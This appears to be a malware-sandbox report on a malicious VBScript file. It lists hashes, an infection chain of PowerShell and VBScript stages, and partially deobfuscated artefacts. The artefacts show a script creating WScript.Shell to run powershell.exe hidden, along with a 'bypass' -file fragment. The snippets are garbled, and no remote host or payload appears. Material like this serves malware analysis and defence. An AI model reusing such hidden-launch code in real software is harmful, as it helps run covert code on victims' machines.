Malicious
Malicious

b3561957fa1dc56bde14108eea35c51f

VBScript
|
MD5: b3561957fa1dc56bde14108eea35c51f
|
Size: 1.27 MB
|
text/vbscript

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b3561957fa1dc56bde14108eea35c51f
Sha1
72d7ea8236f816ad646bd7a89b3d80a9bb113d40
Sha256
7ff9f7b3d5ee5db2673b8210539b617acffd690f2b125097d51a83b750fcfebb
Sha384
9e379d9860e440a36d3d86415846cdfcca67ba3308b477c5b301287faef3b1406758f0e008d5a1571fe2f67340c53166
Sha512
6f21b2aa77575af37d78c740d1991cc869ce182cc700612f7d1f067e1fdc3448c170611096e86659c86c28430ab7a5d16179696558ad1c20f61aa674a97e4a52
SSDeep
768:SLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbLbY:J
TLSH
5F450CED9CA02944BE4976B48E7FDCBA9C035DAB3AFF036143F0519207246ADE436875
File Structure
b3561957fa1dc56bde14108eea35c51f
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
b3561957fa1dc56bde14108eea35c51f.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
.executed
Malicious
.subscript.vbs
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
b3561957fa1dc56bde14108eea35c51f
Malicious
.executed
Malicious
.subscript.vbs
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

cjeotbiwmgnkxuym "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" cjeotbiwmgnkxuym "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" execute "set RRSClvAZKqOqSzvZuOjfhYDPFnnQbD = CreateObject("WScript.Shell")" execute "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD.Run "powershell.exe " "xwrAseuoqyupoduq" & "", 0, false"
Deobfuscated PowerShell

cjeotbiwmgnkxuym "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" cjeotbiwmgnkxuym "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set rrsclvazkqoqszvzuojfhydpfnnqbd = createobject("wscript.shell")" execute "rrsclvazkqoqszvzuojfhydpfnnqbd.run "powershell.exe " "xwraseuoqyupoduq" & "", 0, false"
Deobfuscated PowerShell

cjeotbiwmgnkxuym = rrsclvazkqoqszvzuojfhydpfnnqbd cjeotbiwmgnkxuym = rrsclvazkqoqszvzuojfhydpfnnqbd execute set "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "xwraseuoqyupoduq" & @("", 0, [Unmanaged(ErrorExpressionAst)] ,) false
Deobfuscated PowerShell

[Unmanaged(ErrorExpressionAst)] "bypass" -file $stfgl " set " cjeotbiwmgnkxuym "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" cjeotbiwmgnkxuym "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set" "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "xwraseuoqyupoduq" & @({ @("", 0, [Unmanaged(ErrorExpressionAst)] [Unmanaged(ErrorExpressionAst)] ,) } ) false
b3561957fa1dc56bde14108eea35c51f (1.27 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙